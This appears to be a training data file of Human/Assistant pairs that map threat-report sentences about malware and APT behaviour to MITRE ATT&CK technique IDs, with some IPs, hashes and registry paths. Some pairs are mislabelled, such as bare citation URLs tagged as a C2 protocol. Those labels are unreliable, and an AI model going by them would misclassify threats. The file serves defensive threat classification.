ATT&CK framework.,Higaisa exfiltrated data over its C2 channel.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The write can be performed with native Windows API calls such as VirtualAllocEx and WriteProcessMemory, then invoked with CreateRemoteThread or additional code .### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,VERMIN encrypts the collected files using 3-DES.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may attempt to find domain-level groups and permission settings.### Assistant: T1069: Permission Groups Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BackdoorDiplomacy has disguised their backdoor droppers with naming conventions designed to blend into normal operations.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,iKitten lists the current processes running.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DDKONG lists files on the victim’s machine.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A gh0st RAT variant has used DLL side-loading.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The DNS protocol serves an administrative function in computer networking and thus may be very common in environments.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,InvisiMole determines a working directory where it stores all the gathered data about the compromised machine.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,njRAT can browse file systems using a file manager module.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Examples of such features would include a program being allowed to run because it is signed by a valid code signing certificate, a program prompting the user with a warning because it has an attribute set from being downloaded from the Internet, or getting an indication that you are about to connect to an untrusted site.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PlugX checks if VMware tools is running in the background by searching for any process named ""vmtoolsd"".### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The FIVEHANDS payload is encrypted with AES-128.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Patchwork uses malicious documents to deliver remote execution exploits as part of.### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GreyEnergy encrypts communications using RSA-2048.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,After acquiring credentials from web browsers, adversaries may attempt to recycle the credentials across different systems and/or accounts in order to expand access.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may leverage information repositories to mine valuable information.### Assistant: T1213: Data from Information Repositories" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The wormDll32 module attempts to identify servers and domain controllers in the network using NetServerEnum and LDAP queries.### Assistant: T1482: Domain Trust Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PsExec can also be used to execute commands or payloads via a temporary Windows service created through the service control manager API.### Assistant: T1569: System Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT41 used a keylogger called GEARSHIFT on a target system.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bankshot generates a false TLS handshake using a public certificate to disguise C2 network communications.### Assistant: T1001: Data Obfuscation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The relay step can happen in conjunction with poisoning but may also be independent of it.### Assistant: T1557: Adversary-in-the-Middle" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN5 scripts save memory dump data into a specific directory on hosts in the victim environment.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Network Indicators​ Hostname IP Address Notes mailcenter.support 221.121.138.139 Domain used to for sending spear phishes and user tracking### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PoisonIvy creates a Registry subkey that registers a new service.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT41 used HTTP to download payloads for CVE-2019-19781 and CVE-2020-10189 exploits.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Threat Group-3390 actors installed a credential logger on Microsoft Exchange servers.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The dropper will delete itself at the end of the process### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BBSRAT can start, stop, or delete services.### Assistant: T1569: System Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Carbon can list the processes on the victim’s machine.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In one version of KeyBoy, string obfuscation routines were used to hide many of the critical values referenced in the malware.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,H1N1 kills and disables services for Windows Security Center, and Windows Defender.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Window listings could convey information about how the system is used or give context to information collected by a keylogger.### Assistant: T1010: Application Window Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Public IP addresses may be allocated to organizations by block, or a range of sequential addresses.### Assistant: T1590: Gather Victim Network Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,menuPass has used the Microsoft administration tool csvde.exe to export Active Directory data.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FinFisher enumerates directories and scans for certain files.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turla has used PowerShell profiles to maintain persistence on an infected machine.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT32 has used cmd.exe for execution.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RobbinHood will search for an RSA encryption key and then perform its encryption process on the system files.### Assistant: T1486: Data Encrypted for Impact" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For example, security products may load their own modules and/or modify those loaded by processes to facilitate data collection.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It also gathers network information such as the MAC address, IP address, WINS, DHCP server, and gateway### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,POWRUNER may collect active network connections by running netstat -an on a victim.### Assistant: T1049: System Network Connections Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ZxShell has a command, ps, to obtain a listing of processes on the system.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turian can use WinRAR to create a password-protected archive for files of interest.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SUNBURST collected hostname, OS version, and device uptime.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For C2 over DNS, Helminth converts ASCII characters into their hexadecimal values and sends the data in cleartext.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TA505 has used a wide variety of ransomware, such as Locky, Jaff, Bart, Philadelphia, and GlobeImposter, to encrypt victim files and demand a ransom payment.### Assistant: T1486: Data Encrypted for Impact" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Avaddon uses wmic.exe to delete shadow copies.### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GoldMax has been packed for obfuscation.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ComRAT can check the victim's default browser to determine which process to inject its communications module into.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Some Lazarus Group malware uses a list of ordered port numbers to choose a port for C2 traffic, creating port-protocol mismatches.### Assistant: T1571: Non-Standard Port" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DropBook can unarchive data downloaded from the C2 to obtain the payload and persistence modules.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Having access to software's source code may allow adversaries to develop Exploits, while credentials may provide access to additional resources using Valid Accounts.### Assistant: T1213: Data from Information Repositories" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If running with privileged access, a breakdown of system data can be gathered through the systemsetup configuration tool on macOS.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Anchor can install itself as a cron job.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,XCSSET uses the plutil command to modify the LSUIElement, DFBundleDisplayName, and CFBundleIdentifier keys in the /Contents/Info.plist file.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,T9000 gathers and beacons the MAC and IP addresses during installation.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Utilities used to perform software packing are called packers.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Custom implementations of well-known compression algorithms have also been used.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SHUTTERSPEED can collect system information.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Execute noninteractive commands on multiple hosts at once### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Remsec is capable of deleting files on the victim.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Pteranodon can delete files that may interfere with it executing.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may compromise third-party servers that can be used during targeting.### Assistant: T1584: Compromise Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,InvisiMole lists local users and session information.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chaes requires the user to click on the malicious Word document to execute the next part of the attack.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,IcedID has used SSL and TLS in communications with C2.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turla has encrypted files stolen from connected USB drives into a RAR file before exfiltration.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Several Unix-like systems have moved to Systemd and deprecated the use of RC scripts.### Assistant: T1037: Boot or Logon Initialization Scripts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In this case, after the payload is delivered via an exploit the threat actor places files (named upload.bat, upload.rar, and period.txt, download.txt or silent.txt) in a directory on a Dropbox account### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT32 has stood up websites containing numerous articles and content scraped from the Internet to make them appear legitimate, but some of these pages include malicious JavaScript to profile the potential victim or infect them via a fake software update.### Assistant: T1608: Stage Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries use internal proxies to manage command and control communications inside a compromised environment, to reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between infected systems to avoid suspicion.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also attempt to infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services.### Assistant: T1614: System Location Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It exploits CVE-2017-0199 to download the second stage payload from 193.23.181.151 (Figure 3)### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Helminth can provide a remote shell.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Taidoor can use DeleteFileA to remove files from infected hosts.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,At the same time, Enc.exe will start the encryption routine and append “. jcry ” as file extension to the encrypted file.### Assistant: T1486: Data Encrypted for Impact" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In some of the worst cases for DDoS, so many systems are used to generate requests that each one only needs to send out a small amount of traffic to produce enough volume to exhaust the target's resources.### Assistant: T1499: Endpoint Denial of Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Leviathan used ssh for internal reconnaissance.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,POWERSOURCE is a PowerShell backdoor.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Metamorfo's C2 communication has been encrypted using OpenSSL.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Olympic Destroyer overwrites files locally and on remote shares.### Assistant: T1485: Data Destruction" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may search WHOIS data to gather actionable information.### Assistant: T1596: Search Open Technical Databases" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dark Caracal leveraged a compiled HTML file that contained a command to download and run an executable.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The purpose is to download and execute an additional payload hosted on a compromised website: NavRAT### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,They may be executed from within mach-O binaries by using the macOS Native APIs NSAppleScript or OSAScript, both of which execute code independent of the /usr/bin/osascript command line utility.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may change this file in storage, to be loaded in a future boot, or in memory during runtime.### Assistant: T1601: Modify System Image" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TYPEFRAME can install encrypted configuration data under the Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\laxhost.dll and HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\PrintConfigs.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also perform DLL preloading, also called binary planting attacks, by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Okrum can collect the victim username.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Denis can launch a remote shell to execute arbitrary commands on the victim’s machine.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Comnie uses the net user command.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dragonfly 2.0 compressed data into .zip files prior to exfiltrating it.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rifdoor has the ability to identify the Windows version on the compromised host.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Strike conducts peer-to-peer communication over Windows named pipes encapsulated in the SMB protocol.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RTM runs its core DLL file using rundll32.exe.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Exfiltration servers can be separately configured from C2 servers.### Assistant: T1048: Exfiltration Over Alternative Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,JSS Loader has the ability to download malicious executables to a compromised host.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,XCSSET exfiltrates data stolen from a system over its C2 channel.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SilverTerrier uses HTTP for C2 communications.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Stuxnet schedules a network job to execute two minutes after host infection.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SLOTHFULMEDIA has uploaded files and information from victim machines.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This location data gives the attacker a unique edge, as they can specify a target country or city to attack and maximize their accuracy when choosing a particular target.   The .txt file contains information about the C2 domain and infected machine, as detected in a Cybereason Lab environment### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Whitefly has used search order hijacking to run the loader Vcrodat.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NOKKI can collect data from the victim and stage it in LOCALAPPDATA%\MicroSoft Updatea\uplog.tmp.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may commandeer these sessions to carry out actions on remote systems.### Assistant: T1563: Remote Service Session Hijacking" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KillDisk loads and executes functions from a DLL.### Assistant: T1129: Shared Modules" "### Human:Find the techniques and ID from MITRE ATT&CK framework., capture microphone ### Assistant: T1123: Audio Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RainyDay can use services to establish persistence.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The two variants of MPK share the same registry key that the Trojan uses to automatically run each time the system starts, specifically: [HKLM and HKCU]\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer Both MPK variants include key loggers that are extremely similar in functionality in addition to having the same strings used for headers within the key log file### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may establish persistence by executing malicious content triggered by user inactivity.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Strike can be configured to use TCP, ICMP, and UDP for C2 communications.### Assistant: T1095: Non-Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The ZLib backdoor compresses communications using the standard Zlib compression library.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,AppleJeus's spearphishing links required user interaction to navigate to the malicious website.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN8 has injected malicious code into a new svchost.exe process.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BitPaymer has used RC4-encrypted strings and string hashes to avoid identifiable strings within the binary.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may establish persistence by executing malicious content triggered by a file type association.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A Linux version of Derusbi checks if the victim user ID is anything other than zero , and the malware will not execute if it does not have root privileges.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,[1] https://www.clearskysec.com/report-the-copykittens-are-targeting-israelis/ [2] https://www.clearskysec.com/copykitten-jpost/### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The adversary can then send malicious links or attachments through these services.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ebury can deactivate PAM modules to tamper with the sshd configuration.### Assistant: T1556: Modify Authentication Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,StrongPity can automatically exfiltrate collected documents to the C2 server.### Assistant: T1020: Automated Exfiltration" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,There have also been instances of botnets using a persistent backdoor through malicious Chrome extensions.### Assistant: T1176: Browser Extensions" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mimikatz can be used to extract secrets from memory.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These implementations exist for every major OS but are typically platform specific.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OopsIE can download files from its C2 server to the victim's machine.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,njRAT can collect data from a local system.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,IPC is also commonly used to avoid situations such as deadlocks, which occurs when processes are stuck in a cyclic waiting pattern.### Assistant: T1559: Inter-Process Communication" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It has used a different AES-256 encryption key per file with a bundled RAS-4096 public encryption key that is unique for each victim.### Assistant: T1486: Data Encrypted for Impact" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ASPXTool — A modified version of the ASPXSpy web shell (see Figure 6)### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may search for VME artifacts in memory, processes, file system, hardware, and/or the Registry.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Indicators File Hash Description x.js 3fefa55daeb167931975c22df3eca20a HOMEFRY, a 64-bit Windows password dumper/cracker mt.exe 40528e368d323db0ac5c3f5e1efe4889 MURKYTOP, a command-line reconnaissance tool  com4.js a68bf5fce22e7f1d6f999b7a580ae477 AIRBREAK, a JavaScript-based backdoor which retrieves commands from hidden strings in compromised webpages Historical Indicators File Hash Description green.ddd 3eb6f85ac046a96204096ab65bbd3e7e AIRBREAK, a JavaScript-based backdoor which retrieves commands from hidden strings in compromised webpages BGij 6e843ef4856336fe3ef4ed27a4c792b1 Beacon, a commercially available backdoor msresamn.ttf a9e7539c1ebe857bae6efceefaa9dd16 PHOTO, also reported as Derusbi 1024-aa6a121f98330df2edee6c4391df21ff43a33604 bd9e4c82bf12c4e7a58221fc52fed705 BADFLICK, backdoor that is capable of modifying the file system, generating a reverse shell, and modifying its command-and-control configuration### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Screen captures are taken at specified intervals based on the system.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MegaCortex has used the open-source library, Mbed Crypto, and generated AES keys to carry out the file encryption process.### Assistant: T1486: Data Encrypted for Impact" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The APT1 group is known to have used pass the hash.### Assistant: T1550: Use Alternate Authentication Material" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For macOS, the functionality of this technique is similar but may leverage zsh, the default shell for macOS 10.15+.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Frankenstein has run encoded commands from the command line.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disk content may have worm-like features to propagate across a network by leveraging additional techniques like Valid Accounts, OS Credential Dumping, and SMB/Windows Admin Shares.### Assistant: T1561: Disk Wipe" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This document was also the first of the mid-November cluster which used the user/USER author name instead of Joohn, further supporting the scenario of the document being copied between systems### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SombRAT can store harvested data in a custom database under the %TEMP% directory.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN8 has deleted tmp and prefetch files during post compromise cleanup activities.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Devices in a local network segment communicate with each other by using link layer addresses.### Assistant: T1557: Adversary-in-the-Middle" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Figure 2: Exploit Shellcode used to Locate and Decode Payload The shellcode (Figure 2) searches for and decodes the executable payload contained in memory between the beginning and ending file markers 0xBABABABA and 0xBBBBBBBB, respectively### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,XAgentOSX contains the getFirefoxPassword function to attempt to locate Firefox passwords.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,InvisiMole can list information about files in a directory and recently opened or used documents.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Astaroth checks for the presence of Avast antivirus in the C:\Program\Files\ folder.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hildegard has collected the host's OS, CPU, and memory information.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,XCSSET uses scp to access the ~/Library/Cookies/Cookies.binarycookies file.### Assistant: T1539: Steal Web Session Cookie" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may search DNS data for information about victims that can be used during targeting.### Assistant: T1596: Search Open Technical Databases" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WastedLocker checks for specific registry keys related to the UCOMIEnumConnections and IActiveScriptParseProcedure32 interfaces.### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,When operating systems boot up, they can start processes that perform background system functions.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CHM files are compressed compilations of various content such as HTML documents, images, and scripting/web related programming languages such VBA, JScript, Java, and ActiveX.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Similar to DLL Search Order Hijacking, side-loading involves hijacking which DLL a program loads.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BADNEWS identifies files with certain extensions from USB devices, then copies them to a predefined directory.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BRONZE BUTLER has incorporated code into several tools that attempts to terminate anti-virus processes.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kerrdown has gained execution through victims opening malicious links.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,3PARA RAT will use an 8-byte XOR key derived from the string HYF54&%9&jkMCXuiS if the DES decoding fails Sys10 uses an XOR 0x1 loop to encrypt its C2 domain.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GoldMax has RSA-encrypted its communication with the C2 server.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Elise executes net start after initial communication is made to the remote server.### Assistant: T1007: System Service Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ZIRCONIUM has used a tool to query the Registry for proxy settings.### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Additionally, If adversaries launch their malicious services using svchost.exe, the service’s file may be identified using HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\servicename\Parameters\ServiceDll.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Operation Wocao has used SMB to copy files to and from target systems.### Assistant: T1570: Lateral Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OnionDuke uses HTTP and HTTPS for C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rover has keylogging functionality.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,JHUHUGIT tests if it can reach its C2 server by first attempting a direct connection, and if it fails, obtaining proxy settings and sending the connection through a proxy, and finally injecting code into a running browser if the proxy method fails.### Assistant: T1008: Fallback Channels" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If the user clicks on the link, he will be prompted to download a RAR file that contains the stage 1 malware/lure, which he will execute afterwards### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT40 leverages exploits in their phishing operations, often weaponizing vulnerabilities within days of their disclosure### Assistant: T1068: Exploitation for Privilege Escalation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Inception has used weaponized documents attached to spearphishing emails for reconnaissance and initial compromise.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ZLib has the ability to enumerate files and drives.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,While sending to the C2 server, the data is formatted as follows: @{SYSINFO  = $get.ToString(); ACTION = ""REGISTER"";} Ability to take screenshots### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ThiefQuest uses the function kill_unwanted to obtain a list of running processes and kills each process matching a list of security related processes.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and 